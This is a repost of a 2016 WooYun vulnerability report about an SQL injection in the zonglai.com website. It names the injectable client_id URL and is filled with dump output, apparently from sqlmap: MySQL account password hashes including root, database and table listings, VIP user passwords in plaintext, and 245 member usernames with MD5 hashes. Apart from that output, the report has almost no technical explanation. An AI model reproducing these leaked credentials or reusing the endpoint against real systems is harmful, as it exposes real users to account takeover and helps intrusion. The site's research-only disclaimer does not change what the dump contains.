总来网主站存在严重安全缺陷泄露三万用户信息/一万审核员信息/杂七杂八的信息

admin
admin
admin
139287
文章
114
评论
2017年4月24日18:36:33评论377 views字数 232阅读0分46秒阅读模式
摘要

2016-04-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-25: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-194609

漏洞标题: 总来网主站存在严重安全缺陷泄露三万用户信息/一万审核员信息/杂七杂八的信息

相关厂商: 总来网

漏洞作者: Exploit DB

提交时间: 2016-04-10 14:14

公开时间: 2016-05-25 14:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-04-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT.

详细说明:

code 区域 
http://www.zonglai.com/client_detail.html?client_id=1114

总来网主站存在严重安全缺陷泄露三万用户信息/一万审核员信息/杂七杂八的信息

code 区域 
database management system users password hashes:
 [*] 3d [1]:
     password hash: *0B159336A3B3B35790C1F67F25E1B8D06A2AEC70
 [*] root [1]:
     password hash: *6913943325538CD6AF298D7A08358B4B9CCEDE6B
 [*] zhaomingw [1]:
     password hash: *2B3BA5A67DC5899801629A2F8D4196E451AA3DF5
code 区域 
available databases [9]:
 [*] 3d
 [*] em_zonglai
 [*] information_schema
 [*] mysql
 [*] online_exam
 [*] wcj
 [*] zhaomingw
 [*] zl_blog
 [*] zonglai

经测试 这两个表都有用户信息

总来网主站存在严重安全缺陷泄露三万用户信息/一万审核员信息/杂七杂八的信息

code 区域 
Database: zonglai
 Table: key_vip
 [244 entries]
 +--------------------------------+--------------------------------+--------------------+-----------+
 | vip_name                       | vip_email                      | vip_pass           | vip_phone |
 +--------------------------------+--------------------------------+--------------------+-----------+
 | <blank>                        | <blank>                        | 111111             | <blank>   |
 | <blank>                        | <blank>                        | <blank>            | <blank>   |
 | <blank>                        | <blank>                        | <blank>            | <blank>   |
 | <blank>                        | <blank>                        | a123456            | <blank>   |
 | <blank>                        | <blank>                        | a123456            | <blank>   |
 | <blank>                        | <blank>                        | a123456            | <blank>   |
 | <blank>                        | <blank>                        | haoshi123          | <blank>   |
 |                | 001513             | <blank>   |
 |                | 001513             | <blank>   |
 |               | kms16diesel        | <blank>   |
 |                   | zs76599530         | <blank>   |
 |                   | zs76599530         | <blank>   |
 |               | 250301             | <blank>   |
 |                 | 66273317           | <blank>   |
 |           | xrdzlh0196         | <blank>   |
 |  | 0312huodongfang001 | <blank>   |
 |         | 0320kcps007        | <blank>   |
 |                    | 3935555            | <blank>   |
 |            | 0402yxgs           | <blank>   |
 |             | 0506ups            | <blank>   |
 |          | 0510dianqi         | <blank>   |
 |          | 0510scylqx         | <blank>   |
 |                | sxg5yohg5          | <blank>   |
 |        | 0523zhuanshi       | <blank>   |

先截取部分

总来网主站存在严重安全缺陷泄露三万用户信息/一万审核员信息/杂七杂八的信息

其他库的用户信息

code 区域 
Database: zhaomingw
 +-----------------------+---------+
 | Table                 | Entries |
 +-----------------------+---------+
 | qb_hy_news            | 803     |
 | qb_area               | 537     |
 | qb_hy_picsort         | 400     |
 | qb_hy_company_fid     | 358     |
 | qb_label              | 304     |
 | qb_upfile             | 299     |
 | qb_memberdata         | 245     |
 | qb_members            | 245     |
 | qb_config             | 220     |
 | qb_hy_company         | 200     |
 | qb_hy_home            | 200     |
 | qb_buy_sort           | 133     |
 | qb_hy_sort            | 133     |
 | qb_sell_sort          | 133     |
 | qb_news_content_1     | 68      |
 | qb_sell_content       | 60      |
 | qb_sell_content_1     | 60      |
 | qb_sell_db            | 60      |
 | qb_news_content       | 54      |
 | qb_moneylog           | 52      |
 | qb_sell_pic           | 45      |
 | qb_showroom_city      | 41      |
 | qb_hr_city            | 40      |
 | qb_admin_menu         | 32      |
 | qb_hr_field           | 30      |
 | qb_hy_pic             | 28      |
 | qb_news_sort          | 23      |
 | qb_hack               | 22      |
 | qb_sell_config        | 22      |
 | qb_buy_config         | 21      |
 | qb_showroom_field     | 21      |
 | qb_news_config        | 18      |
 | qb_showroom_pic       | 18      |
 | qb_sell_field         | 17      |
 | qb_vote_element       | 15      |
 | qb_brand_field        | 14      |
 | qb_buy_field          | 14      |
 | qb_brand_sort         | 13      |
 | qb_hr_content         | 13      |
 | qb_hr_content_1       | 13      |
 | qb_template           | 12      |
 | qb_ad_norm_place      | 11      |
 | qb_friendlink         | 11      |
 | qb_hr_sort            | 11      |
 | qb_hy_config          | 11      |
 | qb_module             | 11      |
 | qb_brand_content_2    | 9       |
 | qb_brand_join         | 9       |
 | qb_guestbook_config   | 9       |
 | qb_buy_pic            | 8       |
 | qb_guestbook_content  | 8       |
 | qb_hr_content_2       | 8       |
 | qb_hy_friendlink      | 8       |
 | qb_menu               | 8       |
 | qb_hr_person          | 7       |
 | qb_showroom_content   | 7       |
 | qb_showroom_content_1 | 7       |
 | qb_showroom_sort      | 7       |
 | qb_vote_comment       | 7       |
 | qb_brand_content      | 6       |
 | qb_brand_content_1    | 6       |
 | qb_group              | 6       |
 | qb_showroom_content_3 | 6       |
 | qb_showroom_room      | 6       |
 | qb_brand_config       | 5       |
 | qb_form_config        | 5       |
 | qb_jfabout            | 5       |
 | qb_pm                 | 5       |
 | qb_ad_config          | 4       |
 | qb_crontab            | 4       |
 | qb_hr_apply           | 4       |
 | qb_showroom_config    | 4       |
 | qb_vote_config        | 4       |
 | qb_form_content       | 3       |
 | qb_form_content_3     | 3       |
 | qb_showroom_join      | 3       |
 | qb_showroom_module    | 3       |
 | qb_vote_topic         | 3       |
 | qb_ad_compete_user    | 2       |
 | qb_brand_module       | 2       |
 | qb_buy_module         | 2       |
 | qb_form_module        | 2       |
 | qb_form_reply         | 2       |
 | qb_friendlink_sort    | 2       |
 | qb_guestbook_sort     | 2       |
 | qb_hr_config          | 2       |
 | qb_hr_module          | 2       |
 | qb_jfsort             | 2       |
 | qb_limitword          | 2       |
 | qb_sell_module        | 2       |
 | qb_ad_compete_place   | 1       |
 | qb_ad_norm_user       | 1       |
 | qb_alonepage          | 1       |
 | qb_buy_content        | 1       |
 | qb_buy_content_1      | 1       |
 | qb_buy_content_2      | 1       |
 | qb_buy_db             | 1       |
 | qb_buy_join           | 1       |
 | qb_hr_collection      | 1       |
 | qb_olpay              | 1       |
 | qb_propagandize       | 1       |
 | qb_sgt_grule          | 1       |
 +-----------------------+---------+

总来网主站存在严重安全缺陷泄露三万用户信息/一万审核员信息/杂七杂八的信息

code 区域 
Database: zhaomingw
 Table: qb_members
 [245 entries]
 +-----+-----------------+----------------------------------+
 | uid | username        | password                         |
 +-----+-----------------+----------------------------------+
 | 1   | cnweia          | 4cf4fb6f53d8aef0fcaf5c6146b2d433 |
 | 27  | test1           | 42b72f913c3201fc62660d512f5ac746 |
 | 28  | test2           | 48b83a2a920f7284c9f0e1bf03012b68 |
 | 29  | test3           | e12234d4575a12bfd61d61294f32b086 |
 | 30  | test4           | e125db4ab2e60069409c5857be05d01d |
 | 31  | test5           | 5b25f8c229db5db622a1b29f1ef97c34 |
 | 32  | test6           | 8ae9db4d88e6b21cfadffbf909a2c6b1 |
 | 33  | test7           | cb7127945eb632e244223d3befccd92a |
 | 34  | test8           | 63a8d0a081205ac5966769ad0b50b218 |
 | 35  | test9           | cdc10f414c38f0b165c8aef0eb57f7fd |
 | 36  | test10          | 3960033ed2f9e184af7e5c8cc99d062c |
 | 37  | test11          | 16617490bce8593838933c93db5218eb |
 | 38  | fdsafds         | 80b2157f75e044c8ce67d4e0fd50c24a |
 | 39  | fdsafdsa        | 6b9260b1e02041a665d4e4a5117cfe16 |
 | 40  | wfypuw          | 86d75b6a01ab6394e9e127d67b2a51bc |
 | 41  | hldweia         | 86d75b6a01ab6394e9e127d67b2a51bc |
 | 42  | mrking          | e10adc3949ba59abbe56e057f20f883e |
 | 43  | gpemc           | 0a1f7f0a8279e2ccf943272737c1e6a2 |
 | 44  | 76522171        | e10adc3949ba59abbe56e057f20f883e |
 | 45  | gaomeimei       | 54e45f8a8a105f89eb54612c84a251b1 |
 | 46  | aquablus        | d6a6bc0db10694a2d90e3a69648f3a03 |
 | 47  | a3212522        | c90905a4b287ff624ff05055de95af99 |
 | 48  | wimeicscyw      | abc44eeb6ad2fe2a1acc290735354e03 |
 | 49  | laizichong      | 878fad078f9a37375555437d349cde0e |
 | 50  | ???????¨        | c7901b943c8477ef8fd4144fcc9ad9db |
 | 51  | jinshiyong      | a18d1d530dea339add7ff4fc224659df |
 | 52  | 1055425315      | e10adc3949ba59abbe56e057f20f883e |
 | 53  | civf            | 0296becab3231b48862e458138d925c9 |
 | 54  | nayyayi         | d18c963073095fc710590bef337cb70b |
 | 55  | 328743927       | 19c45ed6589373f20af29ef339b6b927 |
 | 56  | ?ú??????        | e0395f23e641039fcaa6bc9adf01fa1b |
 | 57  | shine_xie       | e4e709b438a0c1d70a34512d0173df90 |
 | 58  | yuyansolar      | a906449d5769fa7361d7ecc6aa3f6d28 |
 | 59  | lwxiaohao05     | 1898d51fc1a6fd204eaecbbe3f6012d3 |
 | 60  | lanyer          | ca6d6e411e924d9867d84115e33ce98c |
 | 61  | douyuan0717     | 902b42b8c285259f06be5d3adfb799ba |
 | 62  | zhengpeng003    | fbcb742b165e540708a5a46b4572326d |
 | 63  | 571770325       | 9cb22d8ccdc36ff4722a08e403c2a471 |
 | 64  | mpftxj          | 15ef7f46095aaa2091deffd4d7a1bcb3 |
 | 65  | easycob         | eace3f334a998327998bd1ae0ea12a3b |
 | 66  | moss03          | 4eead91ec130b13add7c16945a9c700a |
 | 67  | 985363cherry    | da906c2ff5980d22980cfe67346011ca |
 | 68  | 414858949cherry | a311ef2bf544619ffe16156d7afeb769 |
 | 69  | ?ò???ì????×?    | 73daf4463b7e90b007d69dba4fceac3c |
 | 70  | ccxg2014        | 94788f10ee67ed95525e4b270cad75ce |
 | 71  | weifukang688    | 0cb2b63a6248e9d4cf7b4db571d9caf7 |
 | 72  | zyl880908       | 2aef1ec9fd74d2d5d41f49faaaccb43e |
 | 73  | wrd7758         | 195e436c484812ea18af922b65aa315e |
 | 74  | colintonky      | be37e8155fc123934132e353c4e8c918 |
 | 75  | philipszm2013   | afccd80bff22c4ad79663196c9f7ddfa |
 | 76  | 490764508       | f286d669f9a38ec6f9b3c62fda99609d |
 | 77  | vfhjjm          | 3fde6bb0541387e4ebdadf7c2ff31123 |
 | 78  | worldex2013     | 7f018ac6a2eead7909c66133ed79dea3 |
 | 79  | szch123         | b9c540277d0e937e7667b1723e0a7c7b |
 | 80  | bjjr            | 10daf84c3db03c41ed380c1e6e0bedba |
 | 81  | lkk37           | 476994d431dfa9f5effef4e3e13b6f83 |
 | 82  | yx15362858376   | f2cd49973f5cd3d528162ac89a78a028 |
 | 83  | tina            | 29fccb48f69f92670a1b68a9f5a72668 |
 | 84  | ?¨?????÷        | 5fc593b817d3a427ffaaae97f57cbe13 |
 | 85  | clgd2013        | 0fe385e57588ee9518f0b3cfab08484a |
 | 86  | szch            | 5dd6d09e1a2079471dc55d8d743f28e6 |
 | 87  | astrid9         | e10adc3949ba59abbe56e057f20f883e |
 | 88  | 89800982        | 4a3ffa302f517b88e8e85ec470926bab |
 | 89  | ledriguangdeng  | 195dbd49a1cafb3c9c3ec99a4c9824b8 |
 | 90  | zg2589          | c45c6803e27414e7ecf5e8b3ac28dbcb |
 | 91  | dlz123          | 7343b50ea70f428ddd85d857ca4eb0a7 |
 | 92  | ????????        | d42d7954d357abbbda4272e8481d0fd8 |
 | 93  | xiaol001        | 115b4c5237a0052e266ad1ca50a0bd4e |
 | 94  | maggie??        | b2d92dbf072a6a865d96782f003770b4 |
 | 95  | kslf5v          | c3474d3cd5097da7997d809ee739c62b |
 | 96  | rrd336          | 9d9479dcbc2cb3919ca9fd6f06168248 |
 | 97  | zxn8811v        | e7df5a712de01ac9bae5b30e9d367e54 |
 | 98  | jinli           | 9dd57071b4ae577845b755c83085d44a |
 | 99  | ttf566          | 0e4d802662451b0ecd6a383cfa353412 |
 | 100 | yhuy56v         | 1f84eac63d989435d20c534b07ce5be5 |
 | 101 | wwqq336         | 46f23db66e8f5648fdfa7834a162a28c |
 | 102 | lljj1207        | 0fa24486dc91481b71423cdfeabfd61b |
 | 103 | jjdd223         | 7d5dfcc8979b1601b87606c84bd29ce7 |
 | 104 | jzmvk0          | 820d6d40069ce55874d14d5c9d3ce747 |
 | 105 | cjd2233         | 46c01339ba4b01f2f6209abc8c6e3522 |
 | 106 | wygki12         | 87a336ab2902ac785bbe41ececfb64c1 |
 | 107 | fbkl1022        | 278c06e64a77d1f70361e5b89185de8c |
 | 108 | lppcll819       | ad20b05d92d0951f7cfff0b897dbee58 |
 | 109 | xx890218        | 88983d4925a94e6880873087face1703 |
 | 110 | vivi3794        | bbcde146dd010b492b3e8252a2e4d671 |
 | 111 | zzxbbmm20       | 7ce92cff26a81974d8842d81b2f2cc10 |
 | 112 | nuy233          | 2aea7aa0e8339c7ff80ac98152cadd32 |
 | 113 | qqzz1207        | df2e15922fb4f489dfc4f6be43742d66 |
 | 114 | rhsh3069        | 17cf2c3d244f72da4d5199787434c675 |
 | 115 | wwqq113         | 3eab34106cf5b31bc1ffcf8ffc8ecfdb |
 | 116 | cjd4455         | 31c7f1c80040d0d6fbe531b9310a49a2 |
 | 117 | wygki123        | 45c44887850e9ffb368bfcf706f710bb |
 | 118 | cjd3344         | b0d2bb2277dc9d7eb57253fbe91349fc |
 | 119 | jzmvk78         | 820d6d40069ce55874d14d5c9d3ce747 |
 | 120 | hbhb111         | 6bce45294bdc2230f5f905c8c2571b91 |
 | 121 | lppcll520       | 9b3037b2a806d1ec26f34ddb8cfeeece |
 | 122 | zznnaa23        | a339644066cffc97758086090f66265e |
 | 123 | errjgj          | 086485251125aa3ca49a6a4ebaa84650 |
 | 124 | xinxin890218    | 00af48702d40fbd67903c79eac7a74e8 |
 | 125 | ffttty102       | 0bbe6310a991dd8bf5e6527ab8542fcb |
 | 126 | wwqq115         | 4b3fc7680948e2e5f8ef69b1e47aabfb |
 | 127 | lyy150a         | 9062f0c759d651f05e0946fa1622fe8b |
 | 128 | dwp52012        | 36e6a55c500a9fc9546c9acb91408ce0 |
 | 129 | lk88064         | d3c57d69e500b4b9ab4d6fd3edee7ee1 |
 | 130 | ffgg1207        | 3ee24c8b09255fe7fcfc15ad1f8a9997 |
 | 131 | inxin890218     | 655ec4516f2589780d11b665eeb7dac2 |
 | 132 | lpp1215         | c2a85dc6e63e9905a172e6a94ba2d2b2 |
 | 133 | jzmvk88         | 820d6d40069ce55874d14d5c9d3ce747 |
 | 134 | ffttty103       | a82e6ef3db84c3eda318cda1b27b90e5 |
 | 135 | cjd3355         | 0ec12be665c4c7f9eca1a6dab96d45a6 |
 | 136 | msqy233         | 2bc8881b853d00860588c82ac6cf4bb0 |
 | 137 | huahui400       | bc502b60b3ba902c43abc560424d5ac6 |
 | 138 | fanjingyi8888   | 0aa794dbfaed09dbfe1a1cb29179686a |
 | 139 | dwp9488         | 92adce352cffe37cb96f3af5fd598d9f |
 | 140 | ttf234          | a0547c615846e5494954a80a50dcf931 |
 | 141 | xin890218       | e786ba965cf64595a417308feb080f9e |
 | 142 | lyy150aa        | 9062f0c759d651f05e0946fa1622fe8b |
 | 143 | cxcx2c          | eb99f0d3198ea59988ee59a581b2d45e |
 | 144 | rfgd5v          | 0a2f78b61685732f90595a1cb04c0364 |
 | 145 | wenyaqi10kva    | dbbb67e5960a47bab19355add591c9eb |
 | 146 | wwqq116         | 276d273e1fd5c49c6dbb1a1d790bbb6c |
 | 147 | jzmk88          | 820d6d40069ce55874d14d5c9d3ce747 |
 | 148 | ffttty104       | c0a6a8f8ebb6f83769037791c5e4b497 |
 | 149 | abc890218       | ebab341e3bccea088dc1f4219de5506b |
 | 150 | clllpp0315      | 4fc936e547670123759f9eddb041a5f5 |
 | 151 | mjee233         | d2b50944f917e14e30ca2366d342b0a4 |
 | 152 | zznnss23        | 14c538d04f1b7b581b8f091cc4df5c5c |
 | 153 | xin66025        | 4dc0d7373c94bbb9b27b7edb0fbb694d |
 | 154 | LIULING9766     | 537a37171bd375fba2f739151a182944 |
 | 155 | cjd3377         | 106c6b2d08798e9aa53105edb21b18a2 |
 | 156 | lyy150b         | 2f72e98a642ddb6a594314981306d4d3 |
 | 157 | aba890218       | 08c05862c8dbee6443a09fc0149fc41b |
 | 158 | sxth2021        | bd21d5856bdeadde5069e05e16dfde53 |
 | 159 | wwqq117         | f5716ecd6376c86f89e06576911f330a |
 | 160 | cll5200315      | c1d1c40e9158edabdbd000ac7ad60fcf |
 | 161 | xxjjj0v         | 8861841a55f76770afa59224bf41c060 |
 | 162 | hppa688         | 9cf96e24d0cd32fb14e8461223bfc675 |
 | 163 | wwee6093        | 5c46a5c30b8e62d3632b39be7233fdc8 |
 | 164 | lxsa1086        | 08d5cfadde2d130fa12d5c2b8f5acf4d |
 | 165 | ffttty107       | 89054ae24168e00f64455479f8f3d50c |
 | 166 | ttf238          | 631c006a1c9954b89852ad72a454c99d |
 | 167 | hta060915       | 8a0b618452980b013db043d6d961f99f |
 | 168 | zznngg23        | 4190169f4f0652fc3f98ef505a2f635d |
 | 169 | wwqq205         | 3b46021e96278883b0e1a9352b16f768 |
 | 170 | xxx1xv          | 5dbbaf929fb5e18b2f6cc818ac723dba |
 | 171 | jjooo1v         | d7e2dd52510bfd40bab96158333d1baf |
 | 172 | sdxc4f          | 86190be9e5e6dc988940fc4bd29514de |
 | 173 | ttf239          | fef504324cb5118b31c3f1e8a78d0d0b |
 | 174 | ffttty108       | cf640276c183915e58e0e97c7c83482d |
 | 175 | ewww9687        | 09b3688570cab4f349b2c2cde31cb96c |
 | 176 | wwqq206         | 3553332dffefe355576d9681ed2db21c |
 | 177 | zznnhh23        | 15584a680c6765b5b3aa5c51ac4be7df |
 | 178 | tyza1901        | fe6dc029d465712a799a234f4109544e |
 | 179 | abmm233         | 2ced1509480b3cdb06bf7727beb9116f |
 | 180 | ygtt233         | 358ca6b599e89bde611eed7a74b3e5a5 |
 | 181 | eeree5c         | 6dd4ea3bcf037a245b37cdf61fb6c5e0 |
 | 182 | wwqq207         | bb41a30b84f76cdb371a868fb1509759 |
 | 183 | fgh8jk          | 453b9a527f3780991a31f6f035bacff9 |
 | 184 | ookd300         | a0edf4a88ca4b19b4d3808e2ee123ba2 |
 | 185 | ddsdd5v         | fec002b0ca42a60f1f261899fd62271a |
 | 186 | ybvtg1          | dfaef69e893733613fd75ca3e959d926 |
 | 187 | xmnn233         | 32efce765e6059dfa69db04b95af1450 |
 | 188 | wwqq208         | 657bc12618ba43f6d6e7dc68715fe9cb |
 | 189 | feett4          | 1b6dc401c7f20729973ceb809d37bf75 |
 | 190 | rdrft1          | e1885e5ef325b63836b20cc029eabfec |
 | 191 | ljjd666         | caf62b27ec3d2827cdfb0fce90ff524e |
 | 192 | dwp1231         | ac6d7cec1b9cf0d02628161b8f65a448 |
 | 193 | wwqq2088        | 657bc12618ba43f6d6e7dc68715fe9cb |
 | 194 | ffttty109       | 6c1e1e4a06b3c9ec542a6960be82c33f |
 | 195 | msnk233         | e75b032c66738ae5cb1c33c64217a177 |
 | 196 | fh54gd          | bbfce297572fde6d9f613ca4fe17d975 |
 | 197 | jzmzbj          | 14c70e6d757577098fe5623b2ead99d8 |
 | 198 | wwzz6896        | 3b40b5dbac3500b324a87ccbee3bff72 |
 | 199 | dwp9494         | 2547c5a67123ac5b7abe8e7c77c4ae74 |
 | 200 | sssxx5v         | 68219e9d8e151ef3e26888e88e833e1b |
 | 201 | wwqq209         | 7cbd657277899c431244121cf814455e |
 | 202 | ffttty110       | eddc387352e88650437aaffd1a33c3fb |
 | 203 | djbdde2         | a697bbffd9f83704ffdd936d6446116a |
 | 204 | sodo5v          | 43e0747951a1fb8d311d4c1167497101 |
 | 205 | biguo668        | 7dfd54757c67cfa467aff3118819dc84 |
 | 206 | yccd233         | f4f50d3abb8ea5fb656466ac5624de3b |
 | 207 | uujjf2v         | e297065c3446d7b76e47d21da3bd741a |
 | 208 | ged5ed          | c2cd0b4233160666fa7ee2a56a354a18 |
 | 209 | jdakjdlan       | c7fe98a288ed83f5a323dac869166daf |
 | 210 | gig223v         | 0c18097810fc6fc81d7577d070030ebd |
 | 211 | ??????·ü?è±?    | dea5fa9d04eae1b873a558dee0436267 |
 | 212 | smee233         | 6abbf8a09f01d0409a4b7f93687c39e2 |
 | 213 | dwp0214         | 5cc67d4148b143dea0f7e34511e6bca1 |
 | 214 | wwqq210         | df87443cf0099a192ac8b253fecf70e4 |
 | 215 | ywentg          | d681a6e745bd90c8aae35daaef81a87e |
 | 216 | grefgr21        | 8785aa62b614236deee0c6b541efcfbb |
 | 217 | ????            | ead34381c96f4bda8c532a2161b8ec8c |
 | 218 | ebqq233         | a9eef669cdc7f40c3be7345a2655c76d |
 | 219 | sfdjfh1         | 66fa43a6dad2868b4cbfffaabab1d0b5 |
 | 220 | adeehh1         | 2a47ab1fa803406eb69224c241b3ffbb |
 | 221 | tfg004          | f3507f830f8bfd8fef681cdc457b3acd |
 | 222 | yyje333         | e9547f332017c04baf3933a15d89433a |
 | 223 | dsddd2v         | 95afa3f94940ddf0e02fea57897648ac |
 | 224 | qqq22v          | 7b428a1f5d7862a2c0d9b7fa9b9fca6b |
 | 225 | wwqq215         | b55a8b1a0da8a082d908b5343ab08fae |
 | 226 | fgdsq66         | cfcf3850adee6ab649caa521454ed609 |
 | 227 | eeeeffv2        | bd956b64cdc000c91c7242a731c38fa7 |
 | 228 | aasss5v         | e9f987b84b2bf320d5bb192779334e4b |
 | 229 | dwp02145        | d6e29ec95ae09773a300437fc51df1c7 |
 | 230 | cyyccc1         | 8898d9c5a94d14eeeb02b55aa209726c |
 | 231 | jzmhlm          | be2589218042d9fa614596ea60ebc915 |
 | 232 | yujmh3          | 8c92cd2e67b8821625a8f34f3a354000 |
 | 233 | szgwin          | 19d34c9200188e3396d89ccd81263811 |
 | 234 | tdgdc5          | 3aae86d9dc69354db51204f5d998d15d |
 | 235 | affqqa1         | 776c124b2b465339d09183aeba0fd5c8 |
 | 236 | ooodd5v         | 9c0df195b5ece9f34b1f83b5ad9db315 |
 | 237 | rgrsgr8         | 239b9209ce615bb0097c51a5277ce5ed |
 | 238 | cyyaaa1         | dada6fe3aae2cc2bae592909e63f1c03 |
 | 239 | sss222x         | 2c0adb983e64b0836db246d42e0f797b |
 | 240 | jiqiy           | 1ee0e85ebee5682a5c94585488879a9e |
 | 241 | jujuh5          | 31c65b93b64667c3ee1c71434d82368b |
 | 242 | dasss5v         | 4161100997a3322e19e0174099094a86 |
 | 243 | sbss222x        | daaaa209270554b863b5410200276e98 |
 | 244 | tgb1122         | 1d902cf6e533d5c036123ac029ef9df9 |
 | 245 | jadelite        | 07b64e5d14716e9a332f92055d94f600 |
 | 246 | uwegh8          | 977bc0c71194539f18d35db374c5afc6 |
 | 247 | cyybbb1         | be17982f0fe927275d49144303f7d5c7 |
 | 248 | xk8888          | 7be3355277e1dde9433b5cad7b1f9f39 |
 | 249 | wvsd233         | 42d562ad1acd99d92ef7e199abb8f819 |
 | 250 | cyyddd1         | f2bb8a75bc0c5f02392620eba9593ff7 |
 | 251 | xxxsdv2v        | 2e0e6c5770af908f78b3a393c617a3aa |
 | 252 | eabb233         | 49ae6ebad9153bcdd33229b37b3c6e10 |
 | 253 | uuioi1v         | 29315c728c492a9c7374ac6d81b60813 |
 | 254 | hauhn3          | 5df97755e5690242bcad2b19abe289b1 |
 | 255 | hjabhfj8        | b2c2fe8de5181483af41512ea098916e |
 | 256 | cyyeee1         | 446b250233db327fb9ef0eaddd8de2e2 |
 | 257 | xnnd233         | b2f27e9475d7af34c8b4943e59400936 |
 | 258 | cyyeee11        | 446b250233db327fb9ef0eaddd8de2e2 |
 | 259 | hhah005         | b4c3f75327faaa911af2d77fe878072a |
 | 260 | ddss55v         | 842f17b528553165aed6c786f400ee74 |
 | 261 | xx111vx         | 49c9284b0aa893c4a1ac0045f2010b06 |
 | 262 | aaaxv1v         | 98f25aaa140beb37c5743cf7e839e9b6 |
 | 263 | mddb233         | dffbc9a574a621e53f6cdce2ffae5628 |
 | 264 | tdg550          | fb65a62a77eb1c5d975cca6d75c1ae45 |
 | 265 | wwqq142         | 4c83fab4ee908db276b976f71fe8e7b5 |
 | 266 | pnnd233         | 20aefe73302b827d6bbd2209f5017890 |
 | 267 | dddfd2v         | db50509c9062fe1003c5edae0cba85a1 |
 | 268 | xxxd55v         | 8fec8ec3bd34cda085f18d0b30ecb9a8 |
 | 269 | sss5cv          | 00c9371f8fabb8633258df9b4ccfde7d |
 | 270 | dgaag04         | 33eaa6c127a3f66160fc35679e2da3db |
 +-----+-----------------+----------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin